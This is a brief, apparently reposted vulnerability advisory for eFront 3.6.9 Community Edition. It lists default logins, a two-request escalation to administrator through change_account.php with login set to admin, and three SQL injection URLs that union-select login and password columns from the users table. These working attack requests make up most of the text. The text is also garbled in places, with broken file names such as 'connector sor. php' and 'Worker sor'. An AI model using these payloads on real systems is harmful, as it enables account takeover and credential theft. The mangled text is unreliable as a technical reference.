Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities
Public version: When 3.6.10 will be released
Author: IHTeam www.2cto.com
Download link: http://www.efrontlearning.net/download/download-efront.html
Test Platform: efront_3.6.9_build11018
Default username and password:
Student: student
Worker sor: worker sor
How to become an administrator:
Request 1:/change_account.php? Login = admin
Request 2:/userpage. php
Or
Simple use the [Switch account] option on top of the page;
Now you are in the management zone;
SQL Injection:
Www.2cto.com/student. php? Ctg = messages & folder = <valid folder id> union all select 1, 2, 3, password, 5, 6, login, 8, 9, 10, 11, 12 FROM users --
Www.2cto.com/connector sor. php? Ctg = messages & folder = <valid folder id> union all select 1, 2, 3, password, 5, 6, login, 8, 9, 10, 11, 12 FROM users --
Www.2cto.com/admin. php? Ctg = messages & folder = <valid folder id> union all select 1, 2, 3, password, 5, 6, login, 8, 9, 10, 11, 12 FROM users --
Fixed: strict verification